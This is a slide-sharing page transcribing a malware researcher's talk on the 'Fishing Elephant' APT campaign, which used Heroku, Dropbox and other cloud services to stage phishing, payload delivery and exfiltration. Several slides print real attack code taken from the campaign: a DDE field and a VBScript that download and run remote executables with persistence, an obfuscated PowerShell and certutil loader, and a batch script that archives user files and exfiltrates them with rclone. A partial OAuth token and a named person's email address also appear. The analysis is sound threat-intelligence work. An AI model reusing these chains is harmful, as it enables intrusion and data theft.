fishing elephant or how to build cloud based apt whois mak
play

Fishing Elephant, or how to build cloud based APT $ whois mak - PowerPoint PPT Presentation

Apr 30, 2023 •236 likes •684 views

Fishing Elephant, or how to build cloud based APT $ whois mak Independent Malware Researcher / Founder of MalwareLab.pl Dragon Sector CTF RE/Exploit dev Automatization / Formal methods @maciekkotowicz

  1. Fishing Elephant, or how to build cloud based APT

  2. $ whois mak ● Independent Malware Researcher / Founder of MalwareLab.pl ● Dragon Sector CTF ● RE/Exploit dev ● Automatization / Formal methods ● @maciekkotowicz ● mak@malwarelab.pl ● Principal Malware Researcher @ CERT.pl ● Senior Researcher @ Kaspersky GReAT

  3. How to build APT-like attack

  5. Payload hosted on cloud-storage services Exfiltration to cloud-storage providers

  7. Payload hosted on cloud-storage services Intermediate stages run on PaaS platforms C2 hosted on PaaS or free hosting platforms Exfiltration to cloud-storage providers

  9. Payload hosted Open source malware on cloud-storage services Open source exploits/vulnerabilities Intermediate stages run on PaaS platforms C2 hosted on PaaS or free hosting platforms Exfiltration to cloud-storage providers

  11. How Fishing Elephant did it

  17. Campaign Summary ● Spear phishing emails with a link to fake Google Drive ● Doc’s look-alike app hosted on heroku dropping malicious hta ● Decoy image hosted on Google Drive opened via launching a browser ● Payload link hinder via url-shortening service bitly and others ● Payload hosted on cloud storage service ( dropbox , yandex disk , asuswebstorage )

  19. SET e "" REF c REF d REF e DDE C:\Programs\Microsoft\Office\MSWord .exe\..\..\..\..\Windows \System32\cmd.exe SET c "" "cmd /c bitsadmin /transfer data /priority high https://www.dropbox.com/s/pgm729t85j5h1uq/o.txt?dl=1 C:\Users\Public\o.hta & start C:\Users\Public\o.hta" SET d ""

  20. < script language=" VBScript " > window.moveTo -3000, -3000 Dim MaCommande,Ws,Ret Set Ws = CreateObject ("wscript.Shell") Ws.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ", "C:\Users\Public\hplogs.exe ", "REG_SZ" MaCommande = "cmd /c bitsadmin /transfer data /priority high http://185.163.111.90/D3e71ffad76f3d44d6ae482205f3a 2c94/hplogs.exe C:\Users\Public\hplogs.exe " Ret = Ws.run(MaCommande,0,True) window.close()

  22. Campaign Summary ● Spear phishing emails with references to internal documents, and current events ● DDE abused to fetch second stage scripts from Dropbox ● No decoy documents, just blank page ● Off the shelf tools ( bitsadmin ) used for downloading ● Payload link hinder via url-shortening service bitly and others

  23. Newest modifications ● Geofencing for first stage hosted on heroku ○ If check failed - redirect to https://www.dropbox[.]com/s/apvco1h77036wgb/os.txt?dl=1 ○ Else redirect to batch code also hosted on dropbox ● certutil used for decoding final payload cmd /b START /MIN /c powershell -ep -nop -w hidden (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T").DownloadFile('ht'+'tps://www.dropbox.com/s/tjr1jx12qnlz425/b-os.txt?dl=1','C:\Windows\Tasks\certs.txt') certutil -decode C:\Windows\Tasks\certs.txt C:\Windows\Tasks\dnplqs.exe ICACLS "C:\Windows\Tasks\dnplqs.exe" /grant "%computername%":F REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /d "C:\Windows\Tasks\dnplqs.exe"

  24. Open Source Malware

  27. Modded Ares ● Upload file ● Download file ● Zipping file or directory ● Change directory ● Execute cmd.exe commands

  28. Open Source Leaked/Cracked Open Source

  29. Exfiltration

  30. powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/[redacted]/rclone.conf?dl=1','rclone.conf'), (New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/fwo3ec2gfgddkr1/system.exe?dl=1','system. exe') , (New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/3gkzclfdrgzslkp/tmp.exe?dl=1','tmp.exe');

  31. ● system.exe ○ rclone.exe ○ 9b363e52d7c1a96a59964e5ebad6ed8 ● tmp.exe ○ 7z.exe ○ 5e0cfb5f9d4cc24c92c7ebb184d6c9b1

  32. Rclone is a command line program to manage files on cloud storage. [update] type = drive client_id = client_secret = service_account_file = token = {"access_token":"ya29.GlscBYp[redacted]qAVx0sKO4RE5wUCtvx3FLG_nNJ9GQa4liLz7Kxr sXpYzmbRfVO","token_type":"Bearer","refresh_token":"1/r[redacted]Ve4ZdWOqem_eA2ho", "expiry":"2017-12-08T15:08:21.9850685+05:30"} team_drive =

  33. for %%G in (.vcf,.pst,.zip,.rar,.jpg,.jpeg,.doc,.docx,.docm,.xls,.xlk,.xlsx,.slk,.pdf,.ppt,.pptx,.ppsx,.rtf,.xps,.csv,.inp,.rb) do forfiles /p C:\Users\PATOMD~1 /s /m *%%G -d 13-05-2020 /c "cmd /c C:\Users\PATOMD~1\AppData\Roaming\tmp.exe a -tzip C:\Users\Public\Window\%computername%_C_%date:/=.% %time::=.%.zip @path" for %%G in (.vcf,.pst,.zip,.rar,.jpg,.jpeg,.doc,.docx,.docm,.xls,.xlk,.xlsx,.slk,.pdf,.ppt,.pptx,.ppsx,.rtf,.xps,.csv,.inp,.rb) do forfiles /p G: /s /m *%%G -d 01-01-2020 /c "cmd /c C:\Users\PATOMD~1\AppData\Roaming\tmp.exe a -tzip C:\Users\Public\Window\%computername%_G_%date:/=.% %time::=.%.zip @path" cd %appdata% system move --delete-after C:\Users\Public\Window\ update:BD del /q/f/s %TEMP%\*.* del /q/s/f C:\Windows\Tasks\*.txt

  34. Pros of cloud-based/OSS solutions

  35. ● Mostly free, easy to set up, few clicks and you have a working hosting ● Hard to figure out from outside who uses a service ● Easy, scriptable access to your assets ● Can kiss code-based attribution goodby ● Good luck getting a provider to take down an account (with some notable exception such as heroku)

  36. Cons of cloud-based/OSS solutions

  37. ● Metadata, a lot of metadata

  38. ● Metadata, a lot of metadata ... { "kind": "drive#permission", "etag": "\"1Jn1MfFS5e4oWHHjbcjtFXlj934\"", "id": "10242864118326064187", "selfLink": "https://www.googleapis.com/drive/v2beta/files/1MRlT8uoUaVI TWlC_5qsWfu98vuiEq6pC/permissions/10242864118326064 187", "userId": "105520765509160710619", "name": "Bushra Fatima", "emailAddress": "fatima.bushra1990@gmail.com", "domain": "gmail.com", "role": "owner", "type": "user", } ...

  39. ● Metadata, a lot of metadata ● API keys needed for accessing resources

  40. ● Metadata, a lot of metadata ● API keys needed for accessing resources ● Cloud operators have a different visibility into your stuff than typical hosters

  41. Summary

  42. Fishing Elephant summary ● Relatively new actor (since at least 2017) ● Not sophisticated ○ Lack of in-house developed tools ○ However uses interesting methods to glue attacks together ● Heavy use of PaaS and cloud storage ● Relays on open source tools ● Targets South-East part of Asia ● Probably relays on phishing to get access to email servers ● Hard to catch ;/

  43. Cloud-relaying attacks, summary Pros ● Easy to setup and maintain ● Hard to take down ● Hard to detect ● Hard to attribute Cons ● Leaves a lot of metadata ● Access to accounts shared with victims and researches

  44. Q & A? @malwarelabpl contact@malwarelab.pl @maciekkotowicz

Recommend

The Cloud Native Elephant in the Room The Cloud Native Elephant in the Room Bob Quillin, VP

The Cloud Native Elephant in the Room The Cloud Native Elephant in the Room Bob Quillin, VP

The Cloud Native Elephant in the Room The Cloud Native Elephant in the Room Bob Quillin, VP Developer Relations Oracle Cloud Bob Quillin, VP Developer Relations Oracle Cloud @bobquillin @bobquillin Cloud Native: New Rules, New Game How we

351 views • 17 slides
Development of Open Source RESTful WHOIS Linlin Zhou Why We Need a New WHOIS Protocol WHOIS

Development of Open Source RESTful WHOIS Linlin Zhou Why We Need a New WHOIS Protocol WHOIS

Development of Open Source RESTful WHOIS Linlin Zhou Why We Need a New WHOIS Protocol WHOIS Protocol (RFC 3912) has problems WHOIS has never been internationalized WHOIS was defined for ASCII only WHOIS also has no data model The

316 views • 15 slides
Ramping up Security at an open-source startup Lukas Reschke whois lukas@cloud.wtf owncloud.org

Ramping up Security at an open-source startup Lukas Reschke whois lukas@cloud.wtf owncloud.org

Ramping up Security at an open-source startup Lukas Reschke whois lukas@cloud.wtf owncloud.org 2 whois lukas@owncloud.com 1/31/16 3 Not much other hobbies Fixed a lot of stuff Employed since 2014 Contributor since 2012 1/31/16 4 The

606 views • 56 slides
PRIMARY SECTOR FISHING FISHING Definition Types of fishing: deep-sea and shallow-see

PRIMARY SECTOR FISHING FISHING Definition Types of fishing: deep-sea and shallow-see

PRIMARY SECTOR FISHING FISHING Definition Types of fishing: deep-sea and shallow-see fishing. Fishing techniques o Trawling o Seining o Driftnetting o Handlining o Fishtraps Commercial fishing Problems on fishing

611 views • 19 slides
A RESTful Web Service for Whois Andy Newton Chief Engineer, ARIN My Background on Whois

A RESTful Web Service for Whois Andy Newton Chief Engineer, ARIN My Background on Whois

A RESTful Web Service for Whois Andy Newton Chief Engineer, ARIN My Background on Whois Prototyped an LDAP alternative to Whois (RFC 3663) Principal author of CRISP (IRIS) documents RFC 3707, RFC 3981, RFC 3983, RFC 4698, RFC 4991,

558 views • 34 slides
WHOIS Taxonomy Jim Galvin, SSAC Vice Chair 1 Status WHOIS has been discussed for over 10

WHOIS Taxonomy Jim Galvin, SSAC Vice Chair 1 Status WHOIS has been discussed for over 10

WHOIS Taxonomy Jim Galvin, SSAC Vice Chair 1 Status WHOIS has been discussed for over 10 years. The SSAC has issued 5 advisories. From the AoC: ICANN commits to &quot;enforcing its existing policy relating to WHOIS, subject to

270 views • 9 slides
Image BUILD aS - a - SeRVIce Why it makes sense to build your own cloud images OpenStack Summit

Image BUILD aS - a - SeRVIce Why it makes sense to build your own cloud images OpenStack Summit

Image BUILD aS - a - SeRVIce Why it makes sense to build your own cloud images OpenStack Summit Boston 2017 aBoUt US kURt gaRLoff Studied physics Built up SUSE Labs, where he was leading the development open teLekom cLoUD aRchItekt of

544 views • 29 slides
How to build a telco in the cloud Why are we here? Currently, telcos... are seen merely as a

How to build a telco in the cloud Why are we here? Currently, telcos... are seen merely as a

How to build a telco in the cloud Why are we here? Currently, telcos... are seen merely as a wire-provider . o offer a few products, tightly coupled to their infrastructure. o aren't seen as tech-leaders in the cloud/software world.

316 views • 17 slides
Fly Fishing Granite P. What is Fly Fishing? - A method of fishing in which an artificial fly is

Fly Fishing Granite P. What is Fly Fishing? - A method of fishing in which an artificial fly is

Fly Fishing Granite P. What is Fly Fishing? - A method of fishing in which an artificial fly is cast by use of a fly rod, a reel, and a relatively heavy oiled or treated line - Anyone can fly fish - You can fly fish anywhere there is water -

430 views • 27 slides
Cloud based systems that can help you grow your business Some of the cloud based tools we use at

Cloud based systems that can help you grow your business Some of the cloud based tools we use at

Cloud based systems that can help you grow your business Some of the cloud based tools we use at Business Connected Dashlane Crunchboards Trello icloud Adobe Creative Cloud Proposify Receipt Bank Maxmail Dropbox Go to Meeting Mailchimp

328 views • 21 slides
requested WHOIS studies Liz Gasster Senior Policy Counselor February 2011 Goals of WHOIS

requested WHOIS studies Liz Gasster Senior Policy Counselor February 2011 Goals of WHOIS

Update report on GNSO- requested WHOIS studies Liz Gasster Senior Policy Counselor February 2011 Goals of WHOIS studies WHOIS policy has been debated for many years Many competing interests with valid viewpoints GNSO Council

313 views • 7 slides
GNSO-requested WHOIS studies Liz Gasster, Senior Policy Counselor June 2010 Goals of WHOIS

GNSO-requested WHOIS studies Liz Gasster, Senior Policy Counselor June 2010 Goals of WHOIS

Update report on GNSO-requested WHOIS studies Liz Gasster, Senior Policy Counselor June 2010 Goals of WHOIS studies WHOIS policy has been debated for many years Many competing interests with valid viewpoints GNSO Council hopes that

159 views • 13 slides
Fishing From Your Boat Introduction to Sport-Fishing Jonathan Sammut I would like to catch more

Fishing From Your Boat Introduction to Sport-Fishing Jonathan Sammut I would like to catch more

Fishing From Your Boat Introduction to Sport-Fishing Jonathan Sammut I would like to catch more fish! What should I do? Know your target species! What is in season? Is this going to be a fishing trip? Or will I be fishing whilst cruising?

743 views • 30 slides
COMPUTING By Anaobi Ishaku Univerisity of Jos, Nigeria April, 2019 Aims To build an

COMPUTING By Anaobi Ishaku Univerisity of Jos, Nigeria April, 2019 Aims To build an

WORKSHOP on CLOUD BASED ACADEMIC COMPUTING By Anaobi Ishaku Univerisity of Jos, Nigeria April, 2019 Aims To build an opensource driven cloud computing platform We chose openstack for implementing this We set out to use an

1.86k views • 36 slides
Electron Cloud Build Electron Cloud Build- Electron Cloud Build Electron Cloud Build -Up

Electron Cloud Build Electron Cloud Build- Electron Cloud Build Electron Cloud Build -Up

Electron Cloud Build Electron Cloud Build- Electron Cloud Build Electron Cloud Build -Up Modeling - - Up Modeling Up Modeling- Up Modeling - - Part 1 - Part 1 Part 1 Part 1 Roberto Roberto Cimino Cimino ( (LNF LNF- -INFN) INFN)

396 views • 11 slides
How to Build Reliable, Scalable Filesystem Solution Using Cloud Infrastructure Sasikanth

How to Build Reliable, Scalable Filesystem Solution Using Cloud Infrastructure Sasikanth

How to Build Reliable, Scalable Filesystem Solution Using Cloud Infrastructure Sasikanth Eda (sasikanth.eda@in.ibm.com) Master Inventor, Software Engineer IBM Agenda How Cloud is Falling Short for HPC / Technical Computing Introduction

821 views • 23 slides
Update report on GNS O- requested WHOIS studies Liz Gasster S enior Policy Counselor October

Update report on GNS O- requested WHOIS studies Liz Gasster S enior Policy Counselor October

Update report on GNS O- requested WHOIS studies Liz Gasster S enior Policy Counselor October 2010 Goals of WHOIS studies WHOIS policy has been debated for many years Many competing interests with valid viewpoints GNS O

347 views • 8 slides
WHOIS RT Update GNSO Council Workshop Brian Winterfeldt 13 October 2012 WHOIS Review Team Final

WHOIS RT Update GNSO Council Workshop Brian Winterfeldt 13 October 2012 WHOIS Review Team Final

WHOIS RT Update GNSO Council Workshop Brian Winterfeldt 13 October 2012 WHOIS Review Team Final Report Current Status: Board requested GNSO Council Input by July 2012 WHOIS RT on Board Agenda for 18 Oct 2012 GNSO Council unable to

293 views • 4 slides
Cloud Management Chapter 5 eBook: Cloud Compu5ng: Web-Based

Cloud Management Chapter 5 eBook: Cloud Compu5ng: Web-Based

Cloud Management Chapter 5 eBook: Cloud Compu5ng: Web-Based Dynamic IT Services ENGR 5770 / CSCI 5700 Service Compu5ng Winter 2013 1 Cloud

673 views • 21 slides
YOUNG ELEPHANT CONTEST THE YOUNG ELEPHANT CONTEST The 1st contest devoted to the Young Event

YOUNG ELEPHANT CONTEST THE YOUNG ELEPHANT CONTEST The 1st contest devoted to the Young Event

Presents YOUNG ELEPHANT CONTEST THE YOUNG ELEPHANT CONTEST The 1st contest devoted to the Young Event professionals (&lt; 28 y.old) will take place during the EuBEA Festival, the International Festival of Events and Live Communication, Seville

185 views • 3 slides
Advanced Ice Fishing Tactics Clint Ward Rod Selection Average Rod between 24 and 32

Advanced Ice Fishing Tactics Clint Ward Rod Selection Average Rod between 24 and 32

Advanced Ice Fishing Tactics Clint Ward Rod Selection Average Rod between 24 and 32 Fast action tip vs noodle rod Rod eyes should be larger to prevent ice build up Holding rods pistol grip style so rod starts out at 0 degrees

461 views • 30 slides
Elephant &amp; Castle Urban Forest Interim Use Strategy Elephant Amenity Network 24 November 2011

Elephant &amp; Castle Urban Forest Interim Use Strategy Elephant Amenity Network 24 November 2011

Elephant &amp; Castle Urban Forest Interim Use Strategy Elephant Amenity Network 24 November 2011 Contributors Authorship of Images Adrian Glasspool Email applications for use of images and text should Ali Kaviani be addressed to

690 views • 57 slides
Next Gen Startup Cultures INNOVATING AS YOU GROW &gt; whoami Jim Plush Sr Director of

Next Gen Startup Cultures INNOVATING AS YOU GROW &gt; whoami Jim Plush Sr Director of

Next Gen Startup Cultures INNOVATING AS YOU GROW &gt; whoami Jim Plush Sr Director of Engineering, CrowdStrike Employee 30 of &gt; 500 Member of the Culture Team @jimplush &gt; whois &gt; whois Endpoint security &gt; whois

1.33k views • 83 slides
SendGrid Overview SendGrid, the worlds first cloud based email platform, now sends nearly 30

SendGrid Overview SendGrid, the worlds first cloud based email platform, now sends nearly 30

SendGrid Overview SendGrid, the worlds first cloud based email platform, now sends nearly 30 billion emails per month for businesses around the globe. Created by developers who set out to build a better way to send email. Why SendGrid

137 views • 13 slides

More recommend